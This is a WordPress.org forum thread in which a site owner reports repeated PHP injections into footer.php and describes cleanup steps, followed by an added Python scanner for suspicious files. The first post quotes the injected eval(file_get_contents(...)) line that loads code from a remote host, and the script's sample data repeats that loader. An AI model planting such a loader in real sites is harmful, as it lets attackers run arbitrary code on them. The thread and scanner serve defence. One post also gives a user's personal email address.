WordPress.org

Forums

Injection in the Footer (9 posts)

  1. willrich33
    Member
    Posted 1 year ago #

    I believe twice I have had a PHP injection attack in the footer.php file...

    This is the pretty piece of work they put in:

    <?php eval( file_get_contents("http://www.ashburyhoa.org/thelinks.txt") ); ?>

    Anybody else, I would like to know.

    This might not be posted to the right forum!!!

  2. kmessinger
    Moderator
    Posted 1 year ago #

  3. willrich33
    Member
    Posted 1 year ago #

    This is the second time something has magically appeared in my footer. I am guessing it is related to a plugin. You are right, I went to the location and it was a pretty harmless hack. Still, someone has a way into my footer file. I guess maybe my Facebook plugin hooks into wp_footer or something like that, I am not sure, I'm really not a WordPress guru.

    Thanks, Willy

  4. willrich33
    Member
    Posted 1 year ago #

    Update:

    This happened again, same link except the code had things like:

    if (!$exists) {
    $wpdb->query("CREATE TABLE wp_bannedip ( ipaddr VARCHAR(60) )");
    }

    Anybody else get hacked in the footer?

    Thx, Willy

  5. cubecolour
    ɹoʇɐɹǝpoɯ
    Posted 1 year ago #

    What is the URL of your site and which theme are you using?

  6. willrich33
    Member
    Posted 1 year ago #

    Thx cubecolour

    The theme is custom and the site is http://www.jewelheart.org.

    I am afraid to list my plugins...if you want to take the conversation private, my email is kwillrichardson at gmail.com

    I am planning on rebuilding the site to try to close any back doors...I already cleaned up the database and I will check the media files tonight...

    Best, Willy

  7. willrich33
    Member
    Posted 1 year ago #

    cubecolour, kmessinger:

    I continue to work on hardening this site. I just want to publicly acknowledge that I found multiple Trojan-432 trojans in the server's email inboxes. And according to the thread below, this Trojan may be targeted at Tibetan sympathizers.

    https://discussions.apple.com/thread/4940264

    So perhaps the attack is more sophisticated than it looks.

    Thanks, Willy

  8. kmessinger
    Moderator
    Posted 1 year ago #

    When rebuilding please upgrade to 3.8

  9. willrich33
    Member
    Posted 1 year ago #

    Thx, it was 3.8 and it happened again...

    These are the steps I took to try to fix the prob...

    1) Dropped all unused tables from database (you get these from trying plugins), including the table that this hack installed (scary!). Be careful doing this!

    2) Checked all media files to make sure there were no executable files in the media folders.

    3) Went through the site's plugins in the plugin folder and checked that there were no files with dates out of sync with the other files (plugins typically overwrite everything on update, so file dates for a plugin should be exactly the same).

    4) Searched the theme in use for eval and base64 backwards and forwards...also searched for string reverse (strrev). Deleted themes twentyten, twentyeleven, and twentytwelve.

    5) Downloaded a fresh copy of WordPress, unzipped it, and copied wp-content from the current install into the fresh install. Uploaded it into a new directory and got the domain working right with these instructions http://codex.wordpress.org/Giving_WordPress_Its_Own_Directory

    If I didn't get it, I will be back to this post!!!!

    Thx, Willy
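
The file checks in steps 2 to 4 of the last post, sketched as a Python script. This is an added example, not part of the original thread; the function names, the finding labels, the one-hour `skew` threshold and the sample tree built by `demo()` are assumptions constructed for illustration.

```python
import os, pathlib, re, statistics, tempfile

# Patterns named in the thread: eval, base64 forwards and reversed, strrev,
# plus remote content pulled in over HTTP as in the injected footer line.
SUSPICIOUS = re.compile(
    rb"eval\s*\(|base64_decode|edoced_46esab|strrev\s*\(|"
    rb"file_get_contents\s*\(\s*[\"']https?://", re.I)
PHP_EXT = (".php", ".phtml", ".php5", ".phar")

def scan_wp_content(root, skew=3600):
    """Return sorted (check, path) findings for steps 2, 3 and 4 above."""
    found, plugin_mtimes = set(), {}
    for path in pathlib.Path(root).rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        parts = rel.split("/")
        is_php = path.suffix.lower() in PHP_EXT
        if parts[0] == "uploads" and is_php:            # step 2: code in media folders
            found.add(("php-in-uploads", rel))
        if is_php and SUSPICIOUS.search(path.read_bytes()):   # step 4: pattern search
            found.add(("suspicious-code", rel))
        if parts[0] == "plugins" and len(parts) > 2:    # collect mtimes per plugin
            plugin_mtimes.setdefault(parts[1], {})[rel] = path.stat().st_mtime
    for mtimes in plugin_mtimes.values():               # step 3: dates out of sync
        typical = statistics.median(mtimes.values())
        for rel, mtime in mtimes.items():
            if mtime - typical > skew:
                found.add(("newer-than-plugin", rel))
    return sorted(found)

def demo():
    """Build a constructed wp-content tree, scan it, return the findings."""
    t0 = 1_400_000_000  # arbitrary constructed timestamp
    files = {  # all sample content is constructed; example.invalid is a placeholder
        "themes/custom/footer.php": (b'<?php eval( file_get_contents("http://example.invalid/x.txt") ); ?>', t0),
        "uploads/2014/01/photo.jpg": (b"\xff\xd8\xff", t0),
        "uploads/2014/01/thumb.php": (b"<?php echo 1; ?>", t0),
        "plugins/demo/a.php": (b"<?php // a", t0),
        "plugins/demo/b.php": (b"<?php // b", t0),
        "plugins/demo/c.php": (b"<?php // c", t0 + 86400),  # changed a day after the rest
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, (data, mtime) in files.items():
            p = pathlib.Path(root, rel)
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_bytes(data)
            os.utime(p, (mtime, mtime))
        return scan_wp_content(root)
```

Hits are leads for manual review rather than verdicts: legitimate plugins also call `eval` and `base64_decode`, and a file copied or restored by hand will carry a fresh modification time.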

Topic Closed

This topic has been closed to new replies.
